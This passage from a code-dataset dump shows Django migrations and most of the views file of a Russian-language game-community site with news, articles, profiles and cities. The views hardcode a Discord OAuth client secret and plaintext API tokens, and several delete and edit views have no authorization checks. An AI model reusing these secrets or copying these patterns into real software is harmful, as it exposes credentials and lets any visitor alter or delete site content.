Generated by Django 3.2.3 on 2021-06-23 08:10\r\n\r\nfrom django.db import migrations\r\n\r\n\r\nclass Migration(migrations.Migration):\r\n\r\n dependencies = [\r\n ('blog', '0027_auto_20210623_1040'),\r\n ]\r\n\r\n operations = [\r\n migrations.RenameField(\r\n model_name='comment',\r\n old_name='user_id',\r\n new_name='userid',\r\n ),\r\n ]\r\n" }, { "alpha_fraction": 0.5263158082962036, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 23.782608032226562, "blob_id": "f2b5bc79ea0570db1f54510f75d9cb1f96f19d7d", "content_id": "9ccdf55cc4a24fe4fbc460011777d43d93de83eb", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 581, "license_type": "no_license", "max_line_length": 69, "num_lines": 23, "path": "/blog/migrations/0032_auto_20210720_2050.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "# Generated by Django 3.2.3 on 2021-07-20 17:50\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0031_city_status'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='profile',\n name='favorite_fruit',\n field=models.CharField(default='ананас', max_length=128),\n ),\n migrations.AlterField(\n model_name='profile',\n name='role',\n field=models.CharField(default='Игрок', max_length=9),\n ),\n ]\n" }, { "alpha_fraction": 0.5515424609184265, "alphanum_fraction": 0.5563127398490906, "avg_line_length": 29.194602966308594, "blob_id": "362859aac7f8fd6b32eaecf5b144c2b22164c2be", "content_id": "2fa2e2c352e7a1e981f2aa3299dae86c199ac206", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 39113, "license_type": "no_license", "max_line_length": 81, "num_lines": 1223, "path": "/blog/views.py", "repo_name": "Kikono1014/Marupik_site", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, get_object_or_404, redirect\r\nfrom .models import (\r\n News,\r\n Article,\r\n Profile,\r\n City,\r\n Penetration,\r\n NewsComment,\r\n UserComment,\r\n ArticleComment\r\n)\r\nfrom .forms import (\r\n UserForm,\r\n ProfileForm,\r\n ChangeProfileRoleForm,\r\n Add_nuwsForm,\r\n AddArticleForm,\r\n Add_citeForm,\r\n PenetrationForm,\r\n EditPenetrationForm,\r\n NewsCommentForm,\r\n UserCommentForm,\r\n ArticleCommentForm,\r\n DeleteNewsCommentForm,\r\n DeleteUserCommentForm,\r\n EditNewsCommentForm,\r\n DeleteArticleCommentForm,\r\n EditArticleCommentForm,\r\n DeleteNewsForm,\r\n DeleteArticleForm,\r\n DeleteCityForm,\r\n)\r\nfrom django.core.paginator import Paginator\r\nfrom django.contrib.auth.models import User\r\nfrom django.contrib.auth.forms import UserCreationForm\r\nfrom django.contrib.auth import login, logout, authenticate\r\nfrom django.contrib.auth.forms import AuthenticationForm\r\nfrom PIL import Image\r\nfrom django.http import JsonResponse\r\nimport json\r\nimport requests\r\n\r\nAPI_TOKENS = [\r\n \"5uT8TgYv8g\",\r\n \"sGX3oeicfX\",\r\n \"Poh45c27NE\",\r\n \"Nq6Ffwjg0f\",\r\n \"sfc1Z5XhRx\",\r\n \"nBMzRUopIl\"\r\n]\r\n\r\n\r\ndef get_info(request): # Функция для получение информации\r\n islogin = request.user.is_authenticated # залогинен ли вользователь\r\n header_img, style_file = get_style(request) # узнаём какая должна быть\r\n news = get_news(request) # достаём новости для сайд бара\r\n return(islogin, header_img, style_file, news)\r\n\r\n\r\ndef discord(request): # Функция коннекта к ДСу\r\n code = request.GET.get(\"code\")\r\n data = {\r\n \"client_id\": \"623940461412876288\",\r\n \"client_secret\": \"x9XwSpBw7DEDtngEo4XAwWncAfYHvN9Y\",\r\n \"grant_type\": \"authentication_code\",\r\n \"code\": code,\r\n #\"redirect_url\": \"http://mmarupik.pythonanywhere.com\",\r\n #\"scope\": \"idendifity\"\r\n }\r\n r = requests.post(\r\n \"https://discord.com/api/oauth2/token\",\r\n data=data,\r\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}\r\n )\r\n return(JsonResponse(r.json()))\r\n\r\n\r\ndef api(request): # Функция для бота посути\r\n if(\"token\" in request.headers): # Проверка токена\r\n if(request.headers[\"Token\"] not in 
API_TOKENS):\r\n return(JsonResponse({\"error\": \"403\"}))\r\n else:\r\n return(JsonResponse(\r\n {\r\n \"error\":\r\n {\r\n \"code\": \"403\",\r\n \"details\": \"Wrong token\"\r\n }\r\n }\r\n ))\r\n if(request.headers[\"Rtype\"] == \"get\"): # Бот хочет получить данные?\r\n result = {'news': [], 'users': [], \"citys\": [], \"error\": {\"code\": 200}}\r\n obj_news = get_news(request)\r\n for i in obj_news: # Новости\r\n result['news'].append(\r\n {\r\n \"title\": i.title,\r\n \"text\": i.text,\r\n \"comments\": [\r\n {\r\n \"name\": comment.name,\r\n \"userid\": comment.userid,\r\n \"text\": comment.body # Комментарии\r\n } for comment in i.comments.filter(active=True)\r\n ]\r\n }\r\n )\r\n for i in Profile.objects.all(): # Профили\r\n result['users'].append(\r\n {\r\n \"username\": i.user.username,\r\n \"info\": i.info,\r\n \"role\": i.role,\r\n \"isAdmin\": i.admin,\r\n # \"discord\": i.discord\r\n }\r\n )\r\n for i in City.objects.all(): # Города\r\n result[\"citys\"].append(\r\n {\r\n \"title\": i.title,\r\n \"smol_text\": i.smol_text,\r\n \"text\": i.text,\r\n \"author\": i.author,\r\n \"mayor\": i.mayor\r\n }\r\n )\r\n return(JsonResponse(result))\r\n\r\n elif(request.headers[\"Rtype\"] == \"post\"): # Бот хочет добавить данные?\r\n if(\"Add-discord\" in request.headers): # Данные о ДС\r\n json_data = json.loads(request.headers[\"Add-discord\"])\r\n username = json_data[\"username\"]\r\n discord_id = json_data[\"discord_id\"]\r\n user = User.objects.filter(username=username).first()\r\n profile = Profile.objects.filter(user=user).first()\r\n if(profile is not None): # Если профиль существует, то присваиваем.\r\n profile.discord = discord_id # см models.py 88-89\r\n profile.save() # сохраняем изменение в БД\r\n return(JsonResponse({\"error\": {\"code\": 200}}))\r\n else:\r\n return(JsonResponse(\r\n {\r\n \"error\":\r\n {\r\n \"code\": 404,\r\n \"details\": \"Profile not found.\"\r\n }\r\n }))\r\n return(JsonResponse(\r\n {\r\n \"error\":\r\n {\r\n \"code\": 404,\r\n \"details\": \"Command not found.\"\r\n }\r\n }))\r\n\r\n\r\ndef get_client_ip(request): # берём ip юзера\r\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\r\n if x_forwarded_for:\r\n ip = x_forwarded_for.split(',')[0]\r\n else:\r\n ip = request.META.get('REMOTE_ADDR')\r\n return ip\r\n\r\n\r\ndef get_news(request): # достаём список новостей из бд, для сайд бара\r\n res = News.objects.all() # достаём все объекты новостей\r\n res = res.filter(active=True) # отбрасываем неактивные\r\n res = list(reversed(res)) # переворачиваем список, чтобы новые шли первыми\r\n page_obj = res[:3] # отбираем три новейшие\r\n return page_obj # возвращаем новости для дальнейшего использования\r\n\r\n\r\ndef get_style(request): # изменение темы\r\n img = 'image/logo.png' # расположение логотипа сайта в директории static\r\n if('theme' in request.COOKIES): # если в куки есть тема\r\n file = request.COOKIES['theme'] # записываем расположение файла темы\r\n else:\r\n file = 'css/purple_gold.css' # иначе записываем стандартную тему\r\n return(img, file) # возвращаем расположение файлов\r\n\r\n\r\n# Обычные\r\ndef show_main(request): # отображение главной страницы\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if('main_image' in request.COOKIES):\r\n main_image = request.COOKIES['main_image']\r\n else:\r\n main_image = 'image/main2.png' \r\n\r\n context = { # контекст для шаблона\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file,\r\n 'main_image': main_image,\r\n }\r\n return render(\r\n request,\r\n 'primitive/main_page.html',\r\n context\r\n ) # отображение 
шаблона\r\n\r\n\r\ndef show_map(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'primitive/map_page.html', context)\r\n\r\n\r\ndef show_info(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'primitive/info_page.html', context)\r\n\r\n\r\ndef register(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n err = ''\r\n if(request.method == \"POST\"):\r\n user_form = UserCreationForm(request.POST)\r\n if user_form.is_valid():\r\n user = user_form.save()\r\n login(request, user)\r\n return redirect(\"/marupik/main\")\r\n else:\r\n err = user_form.errors.as_data()\r\n else:\r\n user_form = UserCreationForm()\r\n\r\n err = str(err).split(\"'\")\r\n error = []\r\n for i in err:\r\n res = i.split(\".\")\r\n for ii in res:\r\n if ii == '':\r\n error.append(i)\r\n\r\n context = {\r\n 'newses': news,\r\n 'error': error,\r\n 'islogin': islogin,\r\n 'user_form': user_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'primitive/register_page.html', context)\r\n\r\n\r\ndef logout_user(request):\r\n logout(request)\r\n return redirect(\"/marupik/main\")\r\n\r\n\r\ndef login_user(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n err = ''\r\n if request.method == 'POST':\r\n form = AuthenticationForm(request, data=request.POST)\r\n if form.is_valid():\r\n username = form.cleaned_data.get('username')\r\n password = form.cleaned_data.get('password')\r\n user = authenticate(username=username, password=password)\r\n if user is not None:\r\n login(request, user)\r\n return redirect('/marupik/main')\r\n else:\r\n err = \"Пользователь с таким именем не существует\"\r\n else:\r\n err = \"Не верно указаны логин или пароль\"\r\n\r\n form = AuthenticationForm()\r\n context = {\r\n 'newses': news,\r\n 'error': err,\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'primitive/login_page.html', context)\r\n\r\n\r\ndef all_profile(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n users = User.objects.all()\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'users': users,\r\n 'header_img': header_img,\r\n 'style_file': style_file,\r\n }\r\n\r\n return render(request, 'primitive/all_profile_page.html', context)\r\n\r\n\r\n# Новости\r\ndef show_news(request):\r\n islogin = request.user.is_authenticated # залогинен ли вользователь\r\n header_img, style_file = get_style(request) # узнаём какая тема\r\n\r\n res = News.objects.all()\r\n res = res.filter(active=True)\r\n res = list(reversed(res))\r\n paginator = Paginator(res, 3)\r\n page_num = request.GET.get('page')\r\n news = paginator.get_page(page_num)\r\n\r\n context = {\r\n 'newses': news,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/news_page.html', context)\r\n\r\n\r\ndef show_one_news(request, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(News, pk=news_id)\r\n news_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments 
= res.comments.filter(active=True)\r\n if request.method == 'POST':\r\n comment_form = NewsCommentForm(data=request.POST)\r\n if comment_form.is_valid():\r\n new_comment = comment_form.save(commit=False)\r\n new_comment.name = request.user.username\r\n new_comment.role = request.user.profile.role\r\n new_comment.image = request.user.profile.user_image.url\r\n new_comment.userid = request.user.pk\r\n new_comment.news = res\r\n new_comment.save()\r\n return redirect(f\"/news/{news_id}/\")\r\n else:\r\n comment_form = NewsCommentForm()\r\n\r\n context = {\r\n 'news': res,\r\n 'islogin': islogin,\r\n 'news_text': news_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/one_news_page.html', context)\r\n\r\n\r\ndef delete_news_comment(request, comment_id, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n comment_to_delete = get_object_or_404(NewsComment, id=comment_id)\r\n name = comment_to_delete.name\r\n if request.method == 'POST':\r\n form = DeleteNewsCommentForm(request.POST, instance=comment_to_delete)\r\n\r\n if form.is_valid():\r\n comment_to_delete.delete()\r\n return redirect(f\"/marupik/news/{news_id}/\")\r\n\r\n else:\r\n form = DeleteNewsCommentForm(instance=comment_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/delete_news_comment_page.html', context)\r\n\r\ndef delete_news(request, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n news_to_delete = get_object_or_404(News, id=news_id)\r\n name = news_to_delete.author\r\n if request.method == 'POST':\r\n form = DeleteNewsForm(request.POST, instance=news_to_delete)\r\n\r\n if form.is_valid():\r\n news_to_delete.delete()\r\n return redirect(f\"/marupik/news/\")\r\n\r\n else:\r\n form = DeleteNewsForm(instance=news_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/delete_news_page.html', context)\r\n\r\n\r\n\r\ndef edit_news_comment(request, comment_id, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(News, pk=news_id)\r\n news_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n\r\n comment_to_edit = get_object_or_404(NewsComment, id=comment_id)\r\n if request.method == 'POST':\r\n edit_comment_form = EditNewsCommentForm(\r\n request.POST,\r\n instance=comment_to_edit\r\n )\r\n if edit_comment_form.is_valid():\r\n edit_comment_form.save()\r\n return redirect(f\"/marupik/news/{news_id}/\")\r\n else:\r\n err = edit_comment_form.errors.as_data()\r\n print(err)\r\n else:\r\n comment_form = NewsCommentForm()\r\n edit_comment_form = EditNewsCommentForm(instance=comment_to_edit)\r\n\r\n context = {\r\n 'news': res,\r\n 'islogin': islogin,\r\n 'news_text': news_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'edit_comment_form': edit_comment_form,\r\n 'comment_id': comment_id,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/edit_news_comment_page.html', context)\r\n\r\n\r\ndef add_news(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method 
== \"POST\"):\r\n news_form = Add_nuwsForm(request.POST, request.FILES)\r\n if(news_form.is_valid()):\r\n new = news_form.save(commit=False)\r\n new.author = request.user.username\r\n new.save()\r\n news_form.save()\r\n return redirect(\"/marupik/news\")\r\n else:\r\n news_form = Add_nuwsForm()\r\n\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'news_form': news_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/add_news_page.html', context)\r\n\r\n\r\ndef edit_news(request, news_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(News, pk=news_id)\r\n\r\n if(request.method == \"POST\"):\r\n news_form = Add_nuwsForm(request.POST, request.FILES, instance=res)\r\n if news_form.is_valid():\r\n news_form.save()\r\n return redirect(\"/marupik/news\")\r\n else:\r\n news_form = Add_nuwsForm(instance=res)\r\n\r\n author = res.author\r\n user = request.user\r\n image = res.image.url\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'news_form': news_form,\r\n 'author': author,\r\n 'user': user,\r\n 'image': image,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'news/edit_news_page.html', context)\r\n\r\n# Статьи\r\ndef show_articles(request):\r\n islogin = request.user.is_authenticated # залогинен ли пользователь\r\n header_img, style_file = get_style(request) # узнаём какая тема\r\n\r\n res = Article.objects.all()\r\n res = res.filter(active=True)\r\n res = list(reversed(res))\r\n paginator = Paginator(res, 6)\r\n page_num = request.GET.get('page')\r\n article = paginator.get_page(page_num)\r\n\r\n\r\n context = {\r\n 'articles': article,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/article_page.html', context)\r\n\r\n\r\ndef show_one_article(request, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(Article, pk=article_id)\r\n article_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n comments = reversed(comments)\r\n if request.method == 'POST':\r\n comment_form = ArticleCommentForm(data=request.POST)\r\n if comment_form.is_valid():\r\n new_comment = comment_form.save(commit=False)\r\n new_comment.name = request.user.username\r\n new_comment.role = request.user.profile.role\r\n new_comment.image = request.user.profile.user_image.url\r\n new_comment.userid = request.user.pk\r\n new_comment.article = res\r\n new_comment.save()\r\n return redirect(f\"/article/{article_id}/\")\r\n else:\r\n comment_form = ArticleCommentForm()\r\n\r\n context = {\r\n 'article': res,\r\n 'islogin': islogin,\r\n 'article_text': article_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/one_article_page.html', context)\r\n\r\n\r\ndef delete_article(request, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n article_to_delete = get_object_or_404(Article, id=article_id)\r\n name = article_to_delete.author\r\n if request.method == 'POST':\r\n form = DeleteArticleForm(request.POST, instance=article_to_delete)\r\n\r\n if form.is_valid():\r\n article_to_delete.delete()\r\n return 
redirect(f\"/marupik/articles/\")\r\n\r\n else:\r\n form = DeleteArticleForm(instance=article_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/delete_article_page.html', context)\r\n\r\n\r\n\r\ndef delete_article_comment(request, comment_id, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n comment_to_delete = get_object_or_404(ArticleComment, id=comment_id)\r\n name = comment_to_delete.name\r\n if request.method == 'POST':\r\n form = DeleteArticleCommentForm(request.POST, instance=comment_to_delete)\r\n\r\n if form.is_valid():\r\n comment_to_delete.delete()\r\n return redirect(f\"/marupik/article/{article_id}/\")\r\n\r\n else:\r\n form = DeleteArticleCommentForm(instance=comment_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/delete_article_comment_page.html', context)\r\n\r\n\r\ndef edit_article_comment(request, comment_id, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(Article, pk=article_id)\r\n article_text = res.text.split(\"\\r\\n\")\r\n user = request.user.username\r\n\r\n comments = res.comments.filter(active=True)\r\n comments = reversed(comments)\r\n comment_to_edit = get_object_or_404(ArticleComment, id=comment_id)\r\n if request.method == 'POST':\r\n edit_comment_form = EditArticleCommentForm(\r\n request.POST,\r\n instance=comment_to_edit\r\n )\r\n if edit_comment_form.is_valid():\r\n edit_comment_form.save()\r\n return redirect(f\"/marupik/article/{article_id}/\")\r\n else:\r\n err = edit_comment_form.errors.as_data()\r\n else:\r\n comment_form = ArticleCommentForm()\r\n edit_comment_form = EditArticleCommentForm(instance=comment_to_edit)\r\n\r\n context = {\r\n 'article': res,\r\n 'islogin': islogin,\r\n 'article_text': article_text,\r\n 'user': user,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'edit_comment_form': edit_comment_form,\r\n 'comment_id': comment_id,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/edit_article_comment_page.html', context)\r\n\r\n\r\ndef add_article(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n article_form = AddArticleForm(request.POST, request.FILES)\r\n if(article_form.is_valid()):\r\n article = article_form.save(commit=False)\r\n article.author = request.user.username\r\n article.save()\r\n article_form.save()\r\n return redirect(\"/marupik/article\")\r\n else:\r\n article_form = AddArticleForm()\r\n\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'article_form': article_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/add_article_page.html', context)\r\n\r\n\r\ndef edit_article(request, article_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n res = get_object_or_404(Article, pk=article_id)\r\n\r\n if(request.method == \"POST\"):\r\n article_form = AddArticleForm(request.POST, request.FILES, instance=res)\r\n if article_form.is_valid():\r\n article_form.save()\r\n return redirect(\"/marupik/article\")\r\n else:\r\n article_form = AddArticleForm(instance=res)\r\n\r\n author = 
res.author\r\n user = request.user\r\n image = res.image.url\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'article_form': article_form,\r\n 'author': author,\r\n 'user': user,\r\n 'image': image,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'article/edit_article_page.html', context)\r\n\r\n# Профиль\r\ndef upgrade_profile(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n err = ''\r\n if request.method == 'POST':\r\n user_form = UserForm(request.POST, instance=request.user)\r\n profile_form = ProfileForm(\r\n request.POST,\r\n request.FILES,\r\n instance=request.user.profile\r\n )\r\n if user_form.is_valid() and profile_form.is_valid():\r\n user_form.save()\r\n\r\n profile_form.save()\r\n return redirect('/marupik/profile')\r\n else:\r\n err = user_form.errors.as_data()\r\n else:\r\n user_form = UserForm(instance=request.user)\r\n profile_form = ProfileForm(instance=request.user.profile)\r\n err = user_form.errors.as_data()\r\n\r\n err = str(err).split(\"'\")\r\n error = []\r\n for i in err:\r\n res = i.split(\".\")\r\n for ii in res:\r\n if ii == '':\r\n error.append(i)\r\n\r\n user_image = request.user.profile.user_image.url\r\n\r\n context = {\r\n 'newses': news,\r\n 'user_image': user_image,\r\n 'islogin': islogin,\r\n 'user_form': user_form,\r\n 'profile_form': profile_form,\r\n 'error': error,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'profile/upgrade_profile_page.html', context)\r\n\r\n\r\ndef profile(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n username = request.user.username\r\n user_image = request.user.profile.user_image.path\r\n full_info = request.user.profile.info.split(\"\\r\\n\")\r\n role = request.user.profile.role\r\n admin = request.user.profile.admin\r\n userid = request.user.pk\r\n\r\n if username != 'Kikono':\r\n user_image = user_image.replace(\"\\\\\", \"/\")\r\n img = Image.open(user_image)\r\n width = img.size[0]\r\n height = img.size[1]\r\n if width != height:\r\n newsize = (width, width)\r\n img = img.resize(newsize)\r\n width = img.size[0]\r\n height = img.size[1]\r\n img.save(user_image, format=\"png\")\r\n\r\n user_image = request.user.profile.user_image.url\r\n\r\n if 'Мэр' in role:\r\n your_city_name = None\r\n your_city_id = None\r\n cities = City.objects.all()\r\n cities = cities.filter(active=True)\r\n cities = list(reversed(cities))\r\n for city in cities:\r\n if city.mayor == username:\r\n your_city_name = city.title\r\n your_city_id = city.pk\r\n else:\r\n your_city_name = None\r\n your_city_id = None\r\n\r\n if 'Представитель города' in role:\r\n role_color = \"rgb(200, 0, 200)\"\r\n elif 'ФБР' in role or 'Глава ФБР' in role:\r\n role_color = \"blue\"\r\n elif 'Мэр' in role:\r\n role_color = \"brown\"\r\n elif 'Журналист' in role:\r\n role_color = \"rgb(0, 200, 100)\"\r\n elif style_file == 'css/light.css' or style_file == 'css/purple_gold.css':\r\n role_color = \"black\"\r\n else:\r\n role_color = \"white\"\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'user_image': user_image,\r\n 'username': username,\r\n 'full_info': full_info,\r\n 'role': role,\r\n 'admin': admin,\r\n 'your_city_id': your_city_id,\r\n 'your_city_name': your_city_name,\r\n 'userid': userid,\r\n 'role_color': role_color,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'profile/profile_page.html', context)\r\n\r\n\r\ndef another_profile(request, user_id):\r\n islogin, header_img, 
style_file, news = get_info(request)\r\n\r\n user = get_object_or_404(User, pk=user_id)\r\n\r\n username = user.username\r\n user_image = user.profile.user_image.url\r\n full_info = user.profile.info.split(\"\\r\\n\")\r\n role = user.profile.role\r\n admin = user.profile.admin\r\n\r\n if 'Представитель города' in role:\r\n role_color = \"rgb(200, 0, 200)\"\r\n elif 'ФБР' in role or 'Глава ФБР' in role:\r\n role_color = \"blue\"\r\n elif 'Мэр' in role:\r\n role_color = \"brown\"\r\n elif 'Журналист' in role:\r\n role_color = \"rgb(0, 200, 100)\"\r\n elif style_file == 'css/light.css' or style_file == 'css/purple_gold.css':\r\n role_color = \"black\"\r\n else:\r\n role_color = \"white\"\r\n\r\n comments = user.comments.filter(active=True)\r\n if request.method == 'POST':\r\n comment_form = UserCommentForm(data=request.POST)\r\n profile_form = ChangeProfileRoleForm(\r\n request.POST,\r\n instance=user.profile\r\n )\r\n if comment_form.is_valid():\r\n new_comment = comment_form.save(commit=False)\r\n new_comment.name = request.user.username\r\n new_comment.role = request.user.profile.role\r\n new_comment.image = request.user.profile.user_image.url\r\n new_comment.user = user\r\n new_comment.userid = request.user.pk\r\n new_comment.save()\r\n return redirect(f\"/profile/{user_id}/\")\r\n else:\r\n pass\r\n\r\n if profile_form.is_valid():\r\n profile_form.save()\r\n return redirect(f\"/profile/{user_id}/\")\r\n else:\r\n pass\r\n \r\n else:\r\n comment_form = UserCommentForm()\r\n profile_form = ChangeProfileRoleForm(instance=user.profile)\r\n\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'user_image': user_image,\r\n 'username': username,\r\n 'full_info': full_info,\r\n 'role': role,\r\n 'admin': admin,\r\n 'comments': comments,\r\n 'comment_form': comment_form,\r\n 'profile_form': profile_form,\r\n 'user': user,\r\n 'role_color': role_color,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'profile/another_profile_page.html', context)\r\n\r\n\r\ndef delete_user_comment(request, comment_id, user_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n comment_to_delete = get_object_or_404(UserComment, id=comment_id)\r\n name = comment_to_delete.name\r\n if request.method == 'POST':\r\n form = DeleteUserCommentForm(request.POST, instance=comment_to_delete)\r\n\r\n if form.is_valid():\r\n comment_to_delete.delete()\r\n return redirect(f\"/marupik/profile/{user_id}/\")\r\n\r\n else:\r\n form = DeleteUserCommentForm(instance=comment_to_delete)\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'form': form,\r\n 'name': name,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'profile/delete_user_comment_page.html', context)\r\n\r\n\r\n# Города\r\ndef show_cities(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n city = City.objects.all()\r\n city = city.filter(active=True)\r\n city = list(reversed(city))\r\n paginator = Paginator(city, 4)\r\n page_num = request.GET.get('page')\r\n cities = paginator.get_page(page_num)\r\n\r\n for city in cities:\r\n city_image = city.image.path\r\n\r\n city_image = city_image.replace(\"\\\\\", \"/\")\r\n try:\r\n img = Image.open(city_image)\r\n width = img.size[0]\r\n height = img.size[1]\r\n if width != 300 and height != 300:\r\n newsize = (300, 300)\r\n img = img.resize(newsize)\r\n width = img.size[0]\r\n height = img.size[1]\r\n img.save(city_image, format=\"png\")\r\n except Exception:\r\n pass\r\n\r\n 
context = {\r\n 'newses': news,\r\n 'cities': cities,\r\n 'paginator': paginator,\r\n 'islogin': islogin,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n\r\n return render(request, 'city/cities_page.html', context)\r\n\r\n\r\ndef show_one_city(request, city_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n city = get_object_or_404(City, pk=city_id)\r\n text = city.text.split(\"\\r\\n\")\r\n\r\n status = city.status\r\n author = city.author\r\n mayor = city.mayor\r\n user = request.user\r\n\r\n images = [\r\n city.image1.path,\r\n city.image2.path,\r\n city.image3.path,\r\n city.image4.path,\r\n city.image5.path,\r\n ]\r\n\r\n for city_image in images:\r\n city_image = city_image.replace(\"\\\\\", \"/\")\r\n img = Image.open(city_image)\r\n width = img.size[0]\r\n height = img.size[1]\r\n if width != 640 and height != 400:\r\n newsize = (640, 400)\r\n img = img.resize(newsize)\r\n width = img.size[0]\r\n height = img.size[1]\r\n img.save(city_image, format=\"png\")\r\n\r\n context = {\r\n 'islogin': islogin,\r\n 'city': city,\r\n 'text': text,\r\n 'status': status,\r\n 'author': author,\r\n 'mayor': mayor,\r\n 'user': user,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/one_city_page.html', context)\r\n\r\n\r\ndef add_city(request):\r\n islogin, header_img, style_file, news = get_info(request)\r\n\r\n if(request.method == \"POST\"):\r\n city_form = Add_citeForm(request.POST, request.FILES)\r\n if city_form.is_valid():\r\n city = city_form.save(commit=False)\r\n city.author = request.user.username\r\n city.save()\r\n city_form.save()\r\n return redirect(\"/marupik/cities\")\r\n else:\r\n city_form = Add_citeForm()\r\n\r\n role = request.user.profile.role\r\n\r\n context = {\r\n 'newses': news,\r\n 'islogin': islogin,\r\n 'city_form': city_form,\r\n 'role': role,\r\n 'header_img': header_img,\r\n 'style_file': style_file\r\n }\r\n return render(request, 'city/add_city_page.html', context)\r\n\r\n\r\ndef edit_city(request, city_id):\r\n islogin, header_img, style_file, news = get_info(request)\r\n city = get_object_or_404(City, 